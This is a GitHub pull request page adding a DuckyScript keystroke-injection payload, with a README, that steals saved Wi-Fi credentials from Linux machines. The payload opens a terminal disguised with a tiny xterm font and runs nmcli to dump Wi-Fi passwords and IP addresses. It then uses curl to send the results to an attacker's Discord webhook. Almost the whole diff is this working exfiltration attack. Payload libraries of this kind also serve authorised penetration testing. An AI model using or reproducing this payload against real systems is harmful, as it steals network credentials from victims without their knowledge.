Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

New payload exfiltrate linux wifi credentials #236

Open
wants to merge 4 commits into
base: master
Choose a base branch
from
Open

New payload exfiltrate linux wifi credentials #236

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
4 commits
Select commit Hold shift + click to select a range
309209c
Create payload.txt
simen64 May 24, 2024
6f434b3
Create README.md
simen64 May 24, 2024
2edd1e6
Merge branch 'hak5:master' into New-payload_linux-wifi-credentials
simen64 Aug 12, 2024
70fb09b
Add xterm option for making window smaller
simen64 Aug 12, 2024
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
35 changes: 35 additions & 0 deletions payloads/library/exfiltration/Wifi-Creds-Discord-Linux/README.md
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,35 @@
# Exfiltrate wifi creds of a linux system to a discord webhook

This payload grabs the wifi credentials on a linux system and sens it to you with a discord webhook.

## Getting started

### Dependencies
- Linux
- Bash
- Network Manager

### Prerequisites

If your target uses Gnome, uncomment this line in the payload (uncomment by removing `REM_BLOCK` and `END_REM`:
```
REM_BLOCK
Use this if your target is using Gnome (remove REM_BLOCK and END_REM + this line)
ALT F2
DELAY 200
STRINGLN xterm
DELAY 500
END_REM
```

If your target uses a DE or WM that lets you open a terminal with ctrl-alt-t uncomment this line:
```
REM_BLOCK
Use this if your targets DE or WM has the ctrl-alt-t shortcut (remove REM_BLOCK and END_REM + this line)
CTRL-ALT t
DELAY 500
END_REM
```

## Settings
- #dc your discord webhook
42 changes: 42 additions & 0 deletions payloads/library/exfiltration/Wifi-Creds-Discord-Linux/payload.txt
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,42 @@
REM_BLOCK
###############################################
# |
# Title : Get Linux wifi credentials |
# Author : simen64 |
# Version : 1.0 |
# Category : Exfiltration |
# Target : Linux |
# |
###############################################
END_REM

REM change to your keyboard layout
DUCKY_LANG NO

REM put your discord webhook here
DEFINE #dc webhook here

DELAY 2000
CAPSLOCK_DISABLE
DEFAULT_DELAY 10

REM_BLOCK
Use this if your target is using Gnome (remove REM_BLOCK and END_REM + this line)
ALT F2
DELAY 200
STRINGLN xterm -fa monaco -fs 1
DELAY 500
END_REM

REM_BLOCK
Use this if your targets DE or WM has the ctrl-alt-t shortcut (remove REM_BLOCK and END_REM + this line)
CTRL-ALT t
DELAY 500
END_REM

STRING output=$(nmcli dev wifi show-password && nmcli | grep "inet4\|inet6" | grep -v "127.0.0.1\|::1" | sed 's/
CTRL v
TAB
STRINGLN //')
STRINGLN escaped_output=$(printf '%s' "$output" | jq -sRr @json)
STRINGLN curl -H "Content-Type: application/json" -d "{\"username\": \"Wifi grabber\", \"content\": $escaped_output}" "#dc" && exit